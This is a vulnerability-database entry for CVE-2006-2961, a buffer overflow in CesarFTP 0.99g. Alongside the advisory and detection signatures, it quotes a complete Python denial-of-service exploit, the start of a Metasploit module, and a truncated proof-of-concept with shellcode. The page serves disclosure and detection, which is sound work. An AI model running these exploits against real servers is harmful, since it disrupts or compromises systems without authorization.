CVE-2006-2961
published 2006-06-12CVE-2006-2961: Stack-based buffer overflow in CesarFTP 0.99g and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute…
PriorityP356high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
61.94%
99.1th percentile
Stack-based buffer overflow in CesarFTP 0.99g and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long MKD command. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aclogic | cesarftp | <= 0.99g | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8\x22\x72\xe4
- →Detect FTP MKD commands containing a large number of newline (0x0a) characters (671+) in the argument, indicative of the CesarFTP stack overflow exploit. ↗
- →Detect FTP XCWD commands containing 667 or more newline characters in the argument, indicative of the CesarFTP DoS exploit. ↗
- →Banner-check for 'CesarFTP 0.99g' on FTP port 21 to identify vulnerable targets. ↗
- →The exploit requires valid FTP credentials before triggering; monitor for authenticated FTP sessions followed by anomalously large MKD or XCWD commands. ↗
- →NOP sled (0x90 * 40) immediately following the return address in the MKD payload can be used as a byte-pattern signature for detection. ↗
- →Bad characters for payload encoding are null byte, space, newline, and carriage return; payloads avoiding these bytes in shellcode are characteristic of this exploit. ↗
- ·Return addresses (RET values) are OS/SP-specific; the exploit must be targeted to the exact platform to achieve code execution rather than just a crash. ↗
- ·Payload space is limited to 250 bytes and must avoid null bytes, spaces, newlines, and carriage returns. ↗
- ·A large negative stack adjustment (-3500) is used in the Metasploit module to avoid overwriting the payload with function call stack frames. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
CesarFTP 0.99g - XCWD Denial of Service
exploitdb·2016-01-19
CVE-2006-2961 CesarFTP 0.99g - XCWD Denial of Service
CesarFTP 0.99g - XCWD Denial of Service
---
#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Exploit Title : CesarFTP 0.99g -(XCWD)Remote BoF Exploit
# Discovery by : Irving Aguilar
# Email : [email protected]
# Discovery Date : 18.01.2016
# Tested Version : 0.99g
# Vulnerability Type : Denial of Service (DoS)
# Tested on OS : Windows XP Professional SP3 x86 es
import socket
buffer = 'XCWD ' + '\n' * 667 +'\x90' * 20
target = '192.168.1.73'
port = 21
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target, port))
print '[*] Target: ' + target
print '[*] Port: ' + str(port)
s.recv(1024)
s.send('USER ftp\r\n')
s.recv(1024)
s.send('PASS ftp\r\n')
s.recv(1024)
s.send( buffer + '\r\n')
print '[+] Buffer sent'
s.close()
Exploit-DB
CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (2)
exploitdb·2011-02-23
CVE-2006-2961 CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (2)
CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (2)
---
##
# $Id: cesarftp_mkd.rb 11799 2011-02-23 00:58:54Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Cesar FTP 0.99g MKD Command Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g.
You must have valid credentials to trigger this vulnerability. Also, you
only get one chance, so choose your target carefully.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision: 11799 $',
'References' =>
Exploit-DB
CesarFTP 0.99g - 'MKD' Remote Buffer Overflow
exploitdb·2006-06-12
CVE-2006-2961 CesarFTP 0.99g - 'MKD' Remote Buffer Overflow
CesarFTP 0.99g - 'MKD' Remote Buffer Overflow
---
#!/usr/bin/python
#CesarFtp 0.99g 0day Exploit
#Proof of Concept: execute calc.exe
#Tested on XP sp2 polish
#Bug found by h07 [[email protected]]
#Date: 10.06.2006
from socket import *
shellcode = ( #execute calc.exe
"\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1"
"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07"
"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25"
"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5"
"\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d"
"\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4"
"\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\x
Metasploit
Cesar FTP 0.99g MKD Command Buffer Overflow
metasploit
Cesar FTP 0.99g MKD Command Buffer Overflow
Cesar FTP 0.99g MKD Command Buffer Overflow
This module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g. You must have valid credentials to trigger this vulnerability. Also, you only get one chance, so choose your target carefully.
No writeups or analysis indexed.
http://secunia.com/advisories/20574http://www.osvdb.org/26364http://www.securityfocus.com/bid/18586http://www.vupen.com/english/advisories/2006/2287https://exchange.xforce.ibmcloud.com/vulnerabilities/27071http://secunia.com/advisories/20574http://www.osvdb.org/26364http://www.securityfocus.com/bid/18586http://www.vupen.com/english/advisories/2006/2287https://exchange.xforce.ibmcloud.com/vulnerabilities/27071
2006-06-12
Published